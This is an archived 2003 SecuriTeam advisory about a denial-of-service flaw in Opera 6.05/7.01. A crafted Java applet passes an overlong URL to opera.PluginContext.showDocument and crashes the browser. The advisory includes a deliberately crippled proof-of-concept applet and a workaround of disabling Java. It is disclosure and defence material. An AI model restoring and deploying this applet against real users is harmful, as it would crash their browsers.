[NT] Rouge Applet Can Crash Opera
From: support@securiteam.com
Date: 02/11/03
- Previous message: support@securiteam.com: "[NT] Buffer Overflow Found in SQLBase"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 11 Feb 2003 15:18:07 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Rouge Applet Can Crash Opera
------------------------------------------------------------------------
SUMMARY
Analyzing the public interfaces of the Opera JAVA class libraries. A
special applet could be constructed that provokes a JNI call with an
invalid parameter right into a vulnerable routine causing a Denial of
Service.
DETAILS
Vulnerable systems:
* Opera version 6.05
* Opera version 7.01
Analysis:
Opera has its own class files in the opera.jar library. These are
considered trusted by the system policies. However, they are also
vulnerable against invalid user input. In the proof-of-concept shown below
the following showDocument method of the PluginContext object is called
with a URL object carrying a very long string. Executing this method,
causes the call of a native method that cannot handle the value and
therefore raises a JVM crash, which then crashes Opera 7.01. This was
observed on Windows XP and Opera 6.05/7.01 with Java enabled, directly
calling the applet after installation.
//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are couple of obvious syntax
errors to avoid script-kidding
..
import opera.PluginContext; // !! import the vulnerable class
..
public class OperaCall2 extends App1et
{
- -
- - public OperaCall2()
- - {
- - }
- -
- - public void paint(Graphics g)
- - {
- - PluginContext plugincontext = new PluginContext(l);
- - try
- - {
- - plugincontext.showDocument(new URL("http://xxx.xxx" + new
String(new byte[30000])));
- - }
- - catch(Exception exception)
- - {
- - exception.printStackTrace();
- - }
- - }
}
Vendor response:
This is what is rather un-nice, the Opera team does not respond to bug
reports, and neither reads their own forum entries, to which the bug was
also posted.
Solution:
Until a patch becomes available, disable Java by going to: File ->
Preferences -> Multimedia, and uncheck the "Enable Java" item.
ADDITIONAL INFORMATION
The information has been provided by <mailto:schonef@uni-muenster.de>
Marc Schoenefeld.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[NEWS] RTS CryptoBuddy Multiple Encryption Implementation Vulnerabilities"
- Previous message: support@securiteam.com: "[NT] Buffer Overflow Found in SQLBase"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
